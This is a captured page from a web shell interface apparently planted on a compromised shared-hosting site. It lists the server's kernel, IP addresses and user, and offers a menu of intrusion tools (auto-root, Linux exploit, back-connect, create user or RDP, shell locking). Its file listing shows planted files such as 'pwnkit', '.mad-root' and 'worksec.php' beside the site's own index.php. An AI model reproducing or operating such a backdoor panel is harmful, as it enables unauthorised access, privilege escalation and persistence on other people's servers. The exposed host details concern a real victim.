Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
quaadraa /
[ HOME SHELL ]
Name
Size
Permission
Action
760093
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwx---r-x
app
[ DIR ]
drwx---r-x
assets
[ DIR ]
drwx---r-x
css
[ DIR ]
drwx---r-x
js
[ DIR ]
drwx---r-x
lang
[ DIR ]
drwx---r-x
logs
[ DIR ]
drwx---r-x
views
[ DIR ]
drwx---r-x
{app
[ DIR ]
drwx---r-x
.htaccess
705
B
-rw----r--
.mad-root
0
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
config.php
1.52
KB
-rw----r--
googlea4feb1177870b71e.html
53
B
-rw----r--
index.php
694
B
-rw----r--
pwnkit
0
B
-rwxr-xr-x
sitemap.xml
4.96
KB
-rw----r--
wa.jpg
95.39
KB
-rw----r--
worksec.php
1.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php define('ROOT_PATH', __DIR__); if (session_status() === PHP_SESSION_NONE) { session_start(); } ini_set('display_errors', 1); error_reporting(E_ALL); spl_autoload_register(function (string $class): void { $path = ROOT_PATH . '/' . str_replace('\\', '/', $class) . '.php'; $path = str_replace('/App/', '/app/', $path); if (file_exists($path)) { require_once $path; } else { die("Classe introuvable : {$class} → {$path}"); } }); $config = require ROOT_PATH . '/config.php'; if (session_status() === PHP_SESSION_NONE) { session_start(); } $langService = new App\Core\Lang(); $router = new App\Core\Router($langService); $router->dispatch();
Close